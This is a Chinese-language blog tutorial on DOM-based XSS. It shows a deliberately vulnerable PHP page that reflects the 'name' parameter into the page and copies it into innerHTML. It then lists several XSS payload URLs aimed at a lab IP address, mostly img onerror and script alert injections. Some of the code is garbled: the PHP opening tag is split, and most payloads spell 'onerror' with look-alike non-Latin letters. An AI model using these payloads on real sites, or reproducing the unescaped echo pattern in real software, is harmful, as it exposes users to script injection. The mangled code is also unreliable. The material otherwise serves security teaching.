Dom型xss讲解 一次弹窗&二次弹窗
Dom型xss讲解
Dom型 ==》 前端 反射型的一种(利用dom标签)
dom_xss.php
<?
phperror_reporting(0);
$name = $_GET["name"];
?>
<input id="text" type="text" value="<?php echo ($name);?>" />
<div id="print"></div>
<script type="text/javascript" src="http://192.168.1.105:800/xsszhuanxiang/DOM/HtmlUtil.js"/></script>
<script type="text/javascript">var text = document.getElementById("text");
var print = document.getElementById("print");
print.innerHTML = HtmlUtil.htmlEncode(text.value);
// 获取 text的值,并且输出在print内。这里是导致xss的主要原因。
</script>
http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php?name=<script>alert(1)</script>
http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php?name="><img src=x οnerrοr=prompt(1);>
http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php?name=<img src=x οnerrοr=prompt(1);>
http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php?name="><img src=1 οnerrοr=alert(1)><input type="hidden
实现俩种方式插入语句:
http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php
?name=1111<img src=x onerror=prompt(1);>"><img src=x οnerrοr=prompt(1);><"
xss语句:https://www.cnblogs.com/xuehen/p/4814237.html
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗